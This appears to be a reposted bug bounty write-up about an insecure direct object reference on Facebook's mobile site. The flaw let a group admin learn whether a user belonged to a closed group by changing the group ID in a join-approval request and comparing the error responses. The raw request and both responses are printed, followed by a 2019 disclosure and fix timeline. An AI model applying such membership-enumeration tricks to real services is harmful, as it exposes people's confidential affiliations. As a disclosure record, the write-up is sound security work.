.png)
3 years ago
159 BOOK THIS SPACE FOR AD
ARTICLE AD
The issue is Insecure Direct Object with impact malicious user can expose or determine member on closed group. But the issue have limits, if member (on closed group) and attacker is friend. That is reason why the bounty is $3000. If there is no limit, the attacker and victim have no friendship, then the reward is $5000.
A person’s membership in a closed group is confidential. We only know who is the admin. But a person’s status can be identified by modifying the http request via mtouch.facebook.com. The attacker initially stores a request for joining a group he manages, then replaces it with the target group. In this way a person’s membership status will still be known by the appearance of an error “Already a member”.
POST /a/group/?gid=GROUP_ID&aid=USER_ID&refid=18 HTTP/1.1
Host: mtouch.facebook.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: */*
…..
confirm=Approve&m_sess=&fb_dtsg=
…..
Change “gid=” with victim’s group_id“aid=” is user_id who will be checked for membership statusIf person not as member, the response will displayfor (;;);{“__ar”:1,”error”:1376045,”errorSummary”:”Cannot add member”,”errorDescription”:”You need to be an admin or a moderator of the group, or a friend of this person, to add them as a member.”,”payload”:null,”bootloadable”:{},”ixData”:{},”bxData”:{},”gkxData”:{},”qexData”:{},”lid”:”"}
But if person is member from group the responsefor (;;);{“__ar”:1,”error”:1376015,”errorSummary”:”Already a Member”,”errorDescription”:”The person you’ve just tried to add is already a member of this group.”,”payload”:null,”bootloadable”:{},”ixData”:{},”bxData”:{},”gkxData”:{},”qexData”:{},”lid”:”"}
26 May 2019 : Report
30 May 2019: Request for more information
13 June 2019: They fix my report
2 October 2019: Bounty
Bengali (Bangladesh) · 
English (United States) ·